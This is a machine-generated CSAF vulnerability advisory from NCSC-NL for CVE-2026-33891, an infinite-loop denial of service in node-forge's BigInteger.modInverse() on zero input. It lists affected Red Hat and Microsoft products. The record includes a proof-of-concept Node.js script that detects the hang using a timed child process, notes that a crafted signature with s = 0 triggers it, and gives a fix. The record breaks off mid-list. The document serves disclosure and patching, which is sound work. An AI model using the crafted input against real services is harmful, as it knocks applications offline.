{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33891", "tracking": { "current_release_date": "2026-03-31T12:20:14.809010Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33891", "initial_release_date": "2026-03-26T22:54:48.067895Z", "revision_history": [ { "date": "2026-03-26T22:54:48.067895Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-26T22:54:50.708949Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-27T00:21:02.614608Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-28T07:38:05.891543Z", "number": "4", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-28T07:39:03.730383Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-28T07:39:14.786334Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-28T07:40:46.979052Z", "number": "7", "summary": "References created (1)." }, { "date": "2026-03-28T07:43:40.136058Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-28T12:27:55.512310Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (36).| Product Identifiers created (13).| Product Remediations created (36).| References created (4).| CWES updated (1).| Vendor_assessment created." }, { "date": "2026-03-28T12:28:08.508341Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-29T00:38:39.434002Z", "number": "11", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-30T16:39:22.594869Z", "number": "12", "summary": "Unknown change." }, { "date": "2026-03-31T12:19:57.649010Z", "number": "13", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| CWES updated (1)." }, { "date": "2026-03-31T12:20:00.232691Z", "number": "14", "summary": "NCSC Score updated." } ], "status": "interim", "version": "14" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/4", "product": { "name": "vers:rpm/4", "product_id": "CSAFPID-2552001", "product_identification_helper": { "cpe": "cpe:/a:redhat:cryostat:4" } } } ], "category": "product_name", "name": "Cryostat 4" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/5", "product": { "name": "vers:rpm/5", "product_id": "CSAFPID-1459353", "product_identification_helper": { "cpe": "cpe:/a:redhat:logging:5" } } } ], "category": "product_name", "name": "Logging Subsystem for Red Hat OpenShift" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-1508257", "product_identification_helper": { "cpe": "cpe:/a:redhat:ansible_automation_platform:2" } } } ], "category": "product_name", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/1", "product": { "name": "vers:rpm/1", "product_id": "CSAFPID-5940623", "product_identification_helper": { "cpe": "cpe:/a:redhat:podman_desktop:1" } } } ], "category": "product_name", "name": "Red Hat Build of Podman Desktop" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/8", "product": { "name": "vers:rpm/8", "product_id": "CSAFPID-1439292", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_data_grid:8" } } } ], "category": "product_name", "name": "Red Hat Data Grid 8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/10", "product": { "name": "vers:rpm/10", "product_id": "CSAFPID-2858634", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:10" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 10" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/8", "product": { "name": "vers:rpm/8", "product_id": "CSAFPID-1439317", "product_identification_helper": { "cpe": "cpe:/o:redhat:enterprise_linux:8" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/9", "product": { "name": "vers:rpm/9", "product_id": "CSAFPID-1439319", "product_identification_helper": { "cpe": "cpe:/a:redhat:enterprise_linux:9" } } } ], "category": "product_name", "name": "Red Hat Enterprise Linux 9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/7", "product": { "name": "vers:rpm/7", "product_id": "CSAFPID-1439294", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_fuse:7" } } } ], "category": "product_name", "name": "Red Hat Fuse 7" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/7", "product": { "name": "vers:rpm/7", "product_id": "CSAFPID-1439306", "product_identification_helper": { "cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7" } } } ], "category": "product_name", "name": "Red Hat Process Automation 7" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/3", "product": { "name": "vers:rpm/3", "product_id": "CSAFPID-1441200", "product_identification_helper": { "cpe": "cpe:/a:redhat:quay:3" } } } ], "category": "product_name", "name": "Red Hat Quay 3" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/4", "product": { "name": "vers:rpm/4", "product_id": "CSAFPID-2467441", "product_identification_helper": { "cpe": "cpe:/a:redhat:rhboac_hawtio:4" } } } ], "category": "product_name", "name": "Red Hat build of Apache Camel - HawtIO 4" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/2", "product": { "name": "vers:rpm/2", "product_id": "CSAFPID-2467443", "product_identification_helper": { "cpe": "cpe:/a:redhat:service_registry:2" } } } ], "category": "product_name", "name": "Red Hat build of Apicurio Registry 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1837472" } } ], "category": "product_name", "name": "automation-eda-controller" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1837473" } } ], "category": "product_name", "name": "automation-gateway" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5222698" } } ], "category": "product_name", "name": "automation-platform-ui" } ], "category": "product_family", "name": "Red Hat Ansible Automation Platform 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5187689" } } ], "category": "product_name", "name": "elasticsearch-operator-bundle" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2914696" } } ], "category": "product_name", "name": "elasticsearch-proxy-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2914697" } } ], "category": "product_name", "name": "elasticsearch-rhel9-operator" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2855724" } } ], "category": "product_name", "name": "elasticsearch6-rhel9" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1459355" } } ], "category": "product_name", "name": "kibana6-rhel8" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2855725" } } ], "category": "product_name", "name": "logging-curator5-rhel9" } ], "category": "product_family", "name": "Logging Subsystem for Red Hat OpenShift" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2868420" } } ], "category": "product_name", "name": "grafana" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 10" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1496261" } } ], "category": "product_name", "name": "grafana" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2109953" } } ], "category": "product_name", "name": "pcs" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 9" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467444" } } ], "category": "product_name", "name": "io.apicurio-apicurio-registry" } ], "category": "product_family", "name": "Red Hat build of Apicurio Registry 2" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467448" } } ], "category": "product_name", "name": "io.apicurio-apicurito" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1771999" } } ], "category": "product_name", "name": "io.syndesis-syndesis-parent" } ], "category": "product_family", "name": "Red Hat Fuse 7" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2698055" } } ], "category": "product_name", "name": "io.cryostat-cryostat" } ], "category": "product_family", "name": "Cryostat 4" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467442" } } ], "category": "product_name", "name": "io.hawt-project" } ], "category": "product_family", "name": "Red Hat build of Apache Camel - HawtIO 4" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2467445" } } ], "category": "product_name", "name": "org.infinispan-infinispan-console" } ], "category": "product_family", "name": "Red Hat Data Grid 8" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2698057" } } ], "category": "product_name", "name": "org.uberfire-uberfire-parent" } ], "category": "product_family", "name": "Red Hat Process Automation 7" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-2109952" } } ], "category": "product_name", "name": "pcs" } ], "category": "product_family", "name": "Red Hat Enterprise Linux 8" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5940626" } } ], "category": "product_name", "name": "podman-desktop-macos-1" }, { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-5940629" } } ], "category": "product_name", "name": "podman-desktop-windows-1" } ], "category": "product_family", "name": "Red Hat Build of Podman Desktop" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:rpm/unknown", "product": { "name": "vers:rpm/unknown", "product_id": "CSAFPID-1455906" } } ], "category": "product_name", "name": "quay-rhel8" } ], "category": "product_family", "name": "Red Hat Quay 3" } ], "category": "vendor", "name": "Red Hat" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<1.4.0", "product": { "name": "vers:unknown/<1.4.0", "product_id": "CSAFPID-5956281" } } ], "category": "product_name", "name": "Forge" } ], "category": "vendor", "name": "Digital Bazaar" }, { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:microsoft/*", "product": { "name": "vers:microsoft/*", "product_id": "CSAFPID-5197899", "product_identification_helper": { "cpe": "cpe:2.3:a:microsoft:azl3_python-tensorboard_2.16.2-6:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "azl3 python-tensorboard 2.16.2-6 on Azure Linux 3.0" }, { "branches": [ { "category": "product_version_range", "name": "vers:microsoft/*", "product": { "name": "vers:microsoft/*", "product_id": "CSAFPID-5733329", "product_identification_helper": { "cpe": "cpe:2.3:a:microsoft:cbl2_reaper_3.1.1-22:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "cbl2 reaper 3.1.1-22 on CBL Mariner 2.0" } ], "category": "product_family", "name": "Open Source Software" } ], "category": "vendor", "name": "Microsoft" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0|<1.4.0", "product": { "name": "vers:unknown/>=0|<1.4.0", "product_id": "CSAFPID-5920253" } } ], "category": "product_name", "name": "node-forge" } ], "category": "vendor", "name": "digitalbazaar" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33891", "cwe": { "id": "CWE-835", "name": "Loop with Unreachable Exit Condition ('Infinite Loop')" }, "notes": [ { "category": "description", "text": "## Summary\n\nA Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU.\nAffected Package\n\nPackage name: node-forge (npm: node-forge)\nRepository: https://github.com/digitalbazaar/forge\nAffected versions: All versions (including latest)\nAffected file: lib/jsbn.js, function bnModInverse()\nRoot cause component: Bundled copy of the jsbn (JavaScript Big Number) library\n\n## Vulnerability Details\n\nType: Denial of Service (DoS)\nCWE: CWE-835 (Loop with Unreachable Exit Condition)\nAttack vector: Network (if the application processes untrusted input that reaches modInverse)\nPrivileges required: None\nUser interaction: None\nImpact: Availability (process hangs indefinitely)\nSuggested CVSS v3.1 score: 5.3–7.5 (depending on the context of usage)\n\n## Root Cause Analysis\n\nThe BigInteger.prototype.modInverse(m) function in lib/jsbn.js implements the Extended Euclidean Algorithm to compute the modular multiplicative inverse of this modulo m.\nMathematically, the modular inverse of 0 does not exist — gcd(0, m) = m ≠ 1 for any m > 1. However, the implementation does not check whether the input value is zero before entering the algorithm's main loop. When this equals 0, the algorithm's loop condition is never satisfied for termination, resulting in an infinite loop.\nThe relevant code path in lib/jsbn.js:\n```js\njavascriptfunction bnModInverse(m) {\n // ... setup ...\n // No check for this == 0\n // Enters Extended Euclidean Algorithm loop that never terminates when this == 0\n}\n```\n\n## Attack Scenario\n\nAny application using node-forge that passes attacker-controlled or untrusted input to a code path involving modInverse() is vulnerable. Potential attack surfaces include:\n\nDSA/ECDSA signature verification — A crafted signature with s = 0 would trigger s.modInverse(q), causing the verifier to hang.\nCustom RSA or Diffie-Hellman implementations — Applications performing modular arithmetic with user-supplied parameters.\nAny cryptographic protocol where an attacker can influence a value that is subsequently passed to modInverse().\n\nA single malicious request can cause the Node.js event loop to block indefinitely, rendering the entire application unresponsive.\n\n## Proof of Concept\n\nEnvironment Setup\n```bash\nmkdir forge-poc && cd forge-poc\nnpm init -y\nnpm install node-forge\n```\nReproduction (poc.js)\nA single script that safely detects the vulnerability using a child process with timeout. The parent process is never at risk of hanging.\n```bash\nmkdir forge-poc && cd forge-poc\nnpm init -y\nnpm install node-forge\n# Save the script below as poc.js, then run:\nnode poc.js\n```\n```javascript\n'use strict';\nconst { spawnSync } = require('child_process');\n\nconst childCode = `\n const forge = require('node-forge');\n // jsbn may not be auto-loaded; try explicit require if needed\n if (!forge.jsbn) {\n try { require('node-forge/lib/jsbn'); } catch(e) {}\n }\n if (!forge.jsbn || !forge.jsbn.BigInteger) {\n console.error('ERROR: forge.jsbn.BigInteger not available');\n process.exit(2);\n }\n const BigInteger = forge.jsbn.BigInteger;\n const zero = new BigInteger('0', 10);\n const mod = new BigInteger('3', 10);\n // This call should throw or return 0, but instead loops forever\n const inv = zero.modInverse(mod);\n console.log('returned: ' + inv.toString());\n`;\n\nconsole.log('[*] Testing: BigInteger(0).modInverse(3)');\nconsole.log('[*] Expected: throw an error or return quickly');\nconsole.log('[*] Spawning child process with 5s timeout...');\nconsole.log();\n\nconst result = spawnSync(process.execPath, ['-e', childCode], {\n encoding: 'utf8',\n timeout: 5000,\n});\n\nif (result.error && result.error.code === 'ETIMEDOUT') {\n console.log('[VULNERABLE] Child process timed out after 5s');\n console.log(' -> modInverse(0, 3) entered an infinite loop (DoS confirmed)');\n process.exit(0);\n}\n\nif (result.status === 2) {\n console.log('[ERROR] Could not access BigInteger:', result.stderr.trim());\n console.log(' -> Check your node-forge installation');\n process.exit(1);\n}\n\nif (result.status === 0) {\n console.log('[NOT VULNERABLE] modInverse returned:', result.stdout.trim());\n process.exit(1);\n}\n\nconsole.log('[NOT VULNERABLE] Child exited with error (status ' + result.status + ')');\nif (result.stderr) console.log(' stderr:', result.stderr.trim());\nprocess.exit(1);\n```\nExpected Output\n```\n[*] Testing: BigInteger(0).modInverse(3)\n[*] Expected: throw an error or return quickly\n[*] Spawning child process with 5s timeout...\n\n[VULNERABLE] Child process timed out after 5s\n -> modInverse(0, 3) entered an infinite loop (DoS confirmed)\nVerified On\n```\n\nnode-forge v1.3.1 (latest at time of writing)\nNode.js v18.x / v20.x / v22.x\nmacOS / Linux / Windows\n\n## Impact\n\nAvailability: An attacker can cause a complete Denial of Service by sending a single crafted input that reaches the modInverse() code path. The Node.js process will hang indefinitely, blocking the event loop and making the application unresponsive to all subsequent requests.\nScope: node-forge is a widely used cryptographic library with millions of weekly downloads on npm. Any application that processes untrusted cryptographic parameters through node-forge may be affected.\n\n## Suggested Fix\n\nAdd a zero-value check at the entry of bnModInverse() in lib/jsbn.js:\n```javascript\nfunction bnModInverse(m) {\n var ac = m.isEven();\n // Add this check:\n if (this.signum() == 0) {\n throw new Error('BigInteger has no modular inverse: input is zero');\n }\n // ... rest of the existing implementation ...\n}\n```\nAlternatively, return BigInteger.ZERO if that behavior is preferred, though throwing an error is more mathematically correct and consistent with other BigInteger implementations (e.g., Java's BigInteger.modInverse() throws ArithmeticException).", "title": "github - https://api.github.com/advisories/GHSA-5m6q-g25r-mvwx" }, { "category": "description", "text": "## Summary\n\nA Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU.\nAffected Package\n\nPackage name: node-forge (npm: node-forge)\nRepository: https://github.com/digitalbazaar/forge\nAffected versions: All versions (including latest)\nAffected file: lib/jsbn.js, function bnModInverse()\nRoot cause component: Bundled copy of the jsbn (JavaScript Big Number) library\n\n## Vulnerability Details\n\nType: Denial of Service (DoS)\nCWE: CWE-835 (Loop with Unreachable Exit Condition)\nAttack vector: Network (if the application processes untrusted input that reaches modInverse)\nPrivileges required: None\nUser interaction: None\nImpact: Availability (process hangs indefinitely)\nSuggested CVSS v3.1 score: 5.3–7.5 (depending on the context of usage)\n\n## Root Cause Analysis\n\nThe BigInteger.prototype.modInverse(m) function in lib/jsbn.js implements the Extended Euclidean Algorithm to compute the modular multiplicative inverse of this modulo m.\nMathematically, the modular inverse of 0 does not exist — gcd(0, m) = m ≠ 1 for any m > 1. However, the implementation does not check whether the input value is zero before entering the algorithm's main loop. When this equals 0, the algorithm's loop condition is never satisfied for termination, resulting in an infinite loop.\nThe relevant code path in lib/jsbn.js:\n```js\njavascriptfunction bnModInverse(m) {\n // ... setup ...\n // No check for this == 0\n // Enters Extended Euclidean Algorithm loop that never terminates when this == 0\n}\n```\n\n## Attack Scenario\n\nAny application using node-forge that passes attacker-controlled or untrusted input to a code path involving modInverse() is vulnerable. Potential attack surfaces include:\n\nDSA/ECDSA signature verification — A crafted signature with s = 0 would trigger s.modInverse(q), causing the verifier to hang.\nCustom RSA or Diffie-Hellman implementations — Applications performing modular arithmetic with user-supplied parameters.\nAny cryptographic protocol where an attacker can influence a value that is subsequently passed to modInverse().\n\nA single malicious request can cause the Node.js event loop to block indefinitely, rendering the entire application unresponsive.\n\n## Proof of Concept\n\nEnvironment Setup\n```bash\nmkdir forge-poc && cd forge-poc\nnpm init -y\nnpm install node-forge\n```\nReproduction (poc.js)\nA single script that safely detects the vulnerability using a child process with timeout. The parent process is never at risk of hanging.\n```bash\nmkdir forge-poc && cd forge-poc\nnpm init -y\nnpm install node-forge\n# Save the script below as poc.js, then run:\nnode poc.js\n```\n```javascript\n'use strict';\nconst { spawnSync } = require('child_process');\n\nconst childCode = `\n const forge = require('node-forge');\n // jsbn may not be auto-loaded; try explicit require if needed\n if (!forge.jsbn) {\n try { require('node-forge/lib/jsbn'); } catch(e) {}\n }\n if (!forge.jsbn || !forge.jsbn.BigInteger) {\n console.error('ERROR: forge.jsbn.BigInteger not available');\n process.exit(2);\n }\n const BigInteger = forge.jsbn.BigInteger;\n const zero = new BigInteger('0', 10);\n const mod = new BigInteger('3', 10);\n // This call should throw or return 0, but instead loops forever\n const inv = zero.modInverse(mod);\n console.log('returned: ' + inv.toString());\n`;\n\nconsole.log('[*] Testing: BigInteger(0).modInverse(3)');\nconsole.log('[*] Expected: throw an error or return quickly');\nconsole.log('[*] Spawning child process with 5s timeout...');\nconsole.log();\n\nconst result = spawnSync(process.execPath, ['-e', childCode], {\n encoding: 'utf8',\n timeout: 5000,\n});\n\nif (result.error && result.error.code === 'ETIMEDOUT') {\n console.log('[VULNERABLE] Child process timed out after 5s');\n console.log(' -> modInverse(0, 3) entered an infinite loop (DoS confirmed)');\n process.exit(0);\n}\n\nif (result.status === 2) {\n console.log('[ERROR] Could not access BigInteger:', result.stderr.trim());\n console.log(' -> Check your node-forge installation');\n process.exit(1);\n}\n\nif (result.status === 0) {\n console.log('[NOT VULNERABLE] modInverse returned:', result.stdout.trim());\n process.exit(1);\n}\n\nconsole.log('[NOT VULNERABLE] Child exited with error (status ' + result.status + ')');\nif (result.stderr) console.log(' stderr:', result.stderr.trim());\nprocess.exit(1);\n```\nExpected Output\n```\n[*] Testing: BigInteger(0).modInverse(3)\n[*] Expected: throw an error or return quickly\n[*] Spawning child process with 5s timeout...\n\n[VULNERABLE] Child process timed out after 5s\n -> modInverse(0, 3) entered an infinite loop (DoS confirmed)\nVerified On\n```\n\nnode-forge v1.3.1 (latest at time of writing)\nNode.js v18.x / v20.x / v22.x\nmacOS / Linux / Windows\n\n## Impact\n\nAvailability: An attacker can cause a complete Denial of Service by sending a single crafted input that reaches the modInverse() code path. The Node.js process will hang indefinitely, blocking the event loop and making the application unresponsive to all subsequent requests.\nScope: node-forge is a widely used cryptographic library with millions of weekly downloads on npm. Any application that processes untrusted cryptographic parameters through node-forge may be affected.\n\n## Suggested Fix\n\nAdd a zero-value check at the entry of bnModInverse() in lib/jsbn.js:\n```javascript\nfunction bnModInverse(m) {\n var ac = m.isEven();\n // Add this check:\n if (this.signum() == 0) {\n throw new Error('BigInteger has no modular inverse: input is zero');\n }\n // ... rest of the existing implementation ...\n}\n```\nAlternatively, return BigInteger.ZERO if that behavior is preferred, though throwing an error is more mathematically correct and consistent with other BigInteger implementations (e.g., Java's BigInteger.modInverse() throws ArithmeticException).", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-5m6q-g25r-mvwx.json?alt=media" }, { "category": "description", "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Version 1.4.0 patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33891" }, { "category": "description", "text": "Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, a Denial of Service (DoS) vulnerability exists in the node-forge library due to an infinite loop in the BigInteger.modInverse() function (inherited from the bundled jsbn library). When modInverse() is called with a zero value as input, the internal Extended Euclidean Algorithm enters an unreachable exit condition, causing the process to hang indefinitely and consume 100% CPU. Version 1.4.0 patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33891.json" }, { "category": "description", "text": "A flaw was found in the node-forge library, a JavaScript implementation of Transport Layer Security. This vulnerability, inherited from the bundled jsbn library, allows a remote attacker to cause a Denial of Service (DoS). When the BigInteger.modInverse() function is called with a zero value, it enters an infinite loop, causing the process to hang indefinitely and consume 100% of the CPU resources.", "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33891.json" }, { "category": "description", "text": "Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input", "title": "microsoft - https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar" }, { "category": "other", "text": "0.0004", "title": "EPSS" }, { "category": "other", "text": "4.0", "title": "NCSC Score" }, { "category": "other", "text": "There is product_remediation data available from source Redhat", "title": "NCSC Score top decreasing factors" }, { "category": "details", "text": "Severity: 3\n", "title": "Vendor assessment" } ], "product_status": { "known_affected": [ "CSAFPID-5920253", "CSAFPID-5956281", "CSAFPID-1439292", "CSAFPID-1439294", "CSAFPID-1439306", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1496261", "CSAFPID-1508257", "CSAFPID-1771999", "CSAFPID-1837472", "CSAFPID-1837473", "CSAFPID-2109952", "CSAFPID-2109953", "CSAFPID-2467441", "CSAFPID-2467442", "CSAFPID-2467443", "CSAFPID-2467444", "CSAFPID-2467445", "CSAFPID-2467448", "CSAFPID-2552001", "CSAFPID-2698055", "CSAFPID-2698057", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2868420", "CSAFPID-2914696", "CSAFPID-2914697", "CSAFPID-5187689", "CSAFPID-5222698", "CSAFPID-5940623", "CSAFPID-5940626", "CSAFPID-5940629", "CSAFPID-5197899", "CSAFPID-5733329" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-5m6q-g25r-mvwx" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-5m6q-g25r-mvwx.json?alt=media" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33891" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33891.json" }, { "category": "external", "summary": "Source - redhat", "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33891.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - microsoft", "url": "https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2026-Mar" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv; redhat", "url": "https://github.com/digitalbazaar/forge/commit/9bb8d67b99d17e4ebb5fd7596cd699e11f25d023" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-5m6q-g25r-mvwx" }, { "category": "external", "summary": "Reference - github; redhat", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891" }, { "category": "external", "summary": "Reference - redhat", "url": "https://www.cve.org/CVERecord?id=CVE-2026-33891" } ], "remediations": [ { "category": "mitigation", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "CSAFPID-1439292", "CSAFPID-1439294", "CSAFPID-1439306", "CSAFPID-1439317", "CSAFPID-1439319", "CSAFPID-1441200", "CSAFPID-1455906", "CSAFPID-1459353", "CSAFPID-1459355", "CSAFPID-1496261", "CSAFPID-1508257", "CSAFPID-1771999", "CSAFPID-1837472", "CSAFPID-1837473", "CSAFPID-2109952", "CSAFPID-2109953", "CSAFPID-2467441", "CSAFPID-2467442", "CSAFPID-2467443", "CSAFPID-2467444", "CSAFPID-2467445", "CSAFPID-2467448", "CSAFPID-2552001", "CSAFPID-2698055", "CSAFPID-2698057", "CSAFPID-2855724", "CSAFPID-2855725", "CSAFPID-2858634", "CSAFPID-2868420", "CSAFPID-2914696", 